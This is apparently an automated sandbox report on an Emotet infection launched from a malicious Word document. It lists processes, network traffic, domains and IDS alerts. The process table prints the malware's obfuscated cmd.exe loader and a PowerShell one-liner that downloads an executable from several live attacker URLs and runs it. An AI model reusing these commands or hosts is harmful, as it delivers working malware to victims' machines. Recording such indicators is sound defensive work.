URL: | http://lutgerink.com/US/Information/12_18 |
Full analysis: | https://app.any.run/tasks/650afad8-5125-45cf-98cd-d4748e95c2bd |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 19:27:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 1F12FE8C775684F3EC49DCE4823D267E |
SHA1: | 1241E63AB4FCDE77E406625A3407863802ED4A60 |
SHA256: | ED548CD5BBB2228EB56F88B9B8D1EB35FFF7423100D6FB9E74B9DE5A0B399AC2 |
SSDEEP: | 3:N1KSQy62KwB/MKLKin:CSjjB/MK+i |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2980 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2980 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4020 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\FILE-79892369[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3476 | c:\HaJKihRtkdI\pCXQqijRV\palFkcEZwNzvVU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3852 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2708 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2784 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3228 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3508 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2980 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFD1EB19A4DAF14C45.TMP | — | |
MD5:— | SHA256:— | |||
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7FCF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_75E6E0F6-8AB4-48F4-BB3D-FEBA32466816.0\9F6D67AF.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF87B8ADD1FB0037AF.TMP | — | |
MD5:— | SHA256:— | |||
2980 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{49ECA593-FFD6-11E8-91D7-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7DDBC95.wmf | — | |
MD5:— | SHA256:— | |||
4020 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4D8706B.wmf | — | |
MD5:— | SHA256:— | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_75E6E0F6-8AB4-48F4-BB3D-FEBA32466816.0\~DF4CCE46FAC3F7A04B.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3316 | archivesymbol.exe | GET | — | 190.152.12.86:80 | http://190.152.12.86/ | EC | — | — | malicious |
3316 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
3316 | archivesymbol.exe | GET | — | 110.37.219.134:990 | http://110.37.219.134:990/ | PK | — | — | suspicious |
3316 | archivesymbol.exe | GET | — | 152.168.60.9:80 | http://152.168.60.9/ | AR | — | — | malicious |
2312 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
3144 | iexplore.exe | GET | 301 | 185.96.5.160:80 | http://lutgerink.com/US/Information/12_18 | NL | html | 250 b | suspicious |
3316 | archivesymbol.exe | GET | 200 | 190.189.179.140:8080 | http://190.189.179.140:8080/whoami.php | AR | text | 13 b | malicious |
3144 | iexplore.exe | GET | 200 | 185.96.5.160:80 | http://lutgerink.com/US/Information/12_18/ | NL | document | 52.8 Kb | suspicious |
3316 | archivesymbol.exe | GET | 200 | 181.15.92.18:80 | http://181.15.92.18/whoami.php | AR | text | 13 b | malicious |
2312 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2980 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3316 | archivesymbol.exe | 152.168.60.9:80 | — | CABLEVISION S.A. | AR | malicious |
3144 | iexplore.exe | 185.96.5.160:80 | lutgerink.com | CloudVPS B.V. | NL | suspicious |
2312 | powershell.exe | 162.220.162.40:80 | evihdaf.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | malicious |
3316 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
3316 | archivesymbol.exe | 190.152.12.86:80 | — | CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP | EC | malicious |
3316 | archivesymbol.exe | 181.15.92.18:80 | — | Telecom Argentina S.A. | AR | malicious |
3316 | archivesymbol.exe | 110.37.219.134:990 | — | National WiMAX/IMS environment | PK | suspicious |
3316 | archivesymbol.exe | 190.189.179.140:8080 | — | Prima S.A. | AR | malicious |
3316 | archivesymbol.exe | 192.185.120.146:587 | mail.skytravelsv.com | CyrusOne LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
lutgerink.com |
| suspicious |
evihdaf.com |
| malicious |
mail.reladi.com.mx |
| unknown |
imap.gmail.com |
| shared |
mail.grupoquimicocontreras.com.mx |
| unknown |
mail.ciemsa-mty.com.mx |
| unknown |
mail.ledneonchile.cl |
| suspicious |
watermelon.nocdirect.com |
| unknown |
a2plcpnl0344.prod.iad2.secureserver.net |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3144 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
3144 | iexplore.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
3144 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
3144 | iexplore.exe | Attempted User Privilege Gain | SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt |
2312 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2312 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2312 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2312 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2312 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3316 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |